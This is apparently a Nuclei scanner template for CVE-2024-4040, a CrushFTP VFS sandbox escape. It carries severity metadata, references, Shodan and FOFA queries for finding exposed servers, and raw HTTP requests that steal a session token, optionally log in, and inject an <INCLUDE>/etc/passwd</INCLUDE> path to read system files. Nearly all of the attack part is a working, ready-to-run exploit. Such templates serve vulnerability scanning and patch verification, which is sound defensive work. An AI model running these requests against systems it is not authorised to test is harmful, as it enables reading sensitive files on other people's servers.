127 lines
3.8 KiB
YAML
127 lines
3.8 KiB
YAML
id: CVE-2024-4040
|
|
|
|
info:
|
|
name: CrushFTP VFS - Sandbox Escape LFR
|
|
author: DhiyaneshDK,pussycat0x
|
|
severity: critical
|
|
description: |
|
|
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
|
|
impact: |
|
|
Successful exploitation could lead to unauthorized access to sensitive data.
|
|
remediation: |
|
|
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
|
|
reference:
|
|
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
|
|
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
|
|
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
|
|
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2024-4040
|
|
cwe-id: CWE-94,CWE-1336
|
|
epss-score: 0.016
|
|
epss-percentile: 0.87316
|
|
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 5
|
|
vendor: crushftp
|
|
product: crushftp
|
|
shodan-query:
|
|
- "html:\"CrushFTP\""
|
|
- http.html:"crushftp"
|
|
fofa-query: "body=\"crushftp\""
|
|
tags: cve,cve2024,lfr,crushftp,vfs,kev
|
|
flow: |
|
|
if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
|
|
// if username or password is not provided, run unauthenticated exploit
|
|
http("unauth-exploit")
|
|
} else {
|
|
// if username and password is provided, run login script and authenticated exploit
|
|
http("login") && http("auth-exploit")
|
|
}
|
|
|
|
http:
|
|
# unauthenticated exploit
|
|
- id: unauth-exploit
|
|
raw:
|
|
- |
|
|
GET /WebInterface/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "root:x:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/xml"
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: auth
|
|
internal: true
|
|
part: header_1
|
|
group: 1
|
|
regex:
|
|
- 'currentAuth=([0-9a-zA-Z]+)'
|
|
# login script
|
|
- id: login
|
|
raw:
|
|
- |
|
|
GET /WebInterface/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /WebInterface/function/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Length: 111
|
|
Origin: {{RootURL}}
|
|
Referer: http://{{RootURL}}/WebInterface/login.html
|
|
|
|
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
internal: true
|
|
words:
|
|
- "<response>success</response>"
|
|
|
|
- type: word
|
|
part: header_2
|
|
internal: true
|
|
words:
|
|
- "text/xml"
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: auth
|
|
internal: true
|
|
part: header_2
|
|
group: 1
|
|
regex:
|
|
- 'currentAuth=([0-9a-zA-Z]+)'
|
|
# authenticated exploit
|
|
- id: auth-exploit
|
|
raw:
|
|
- |
|
|
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "root:x:"
|
|
# digest: 4a0a0047304502205948e827bf5269dd832ea8fc33d44f6117231bf9ad76ba8e2cb63850d4e41fb8022100dc3dd1a4a7e74dc17bfa8f30e8cf13605fbbc7bf05806d9aca6243bf03db95ac:922c64590222798bb761d5b6d8e72950 |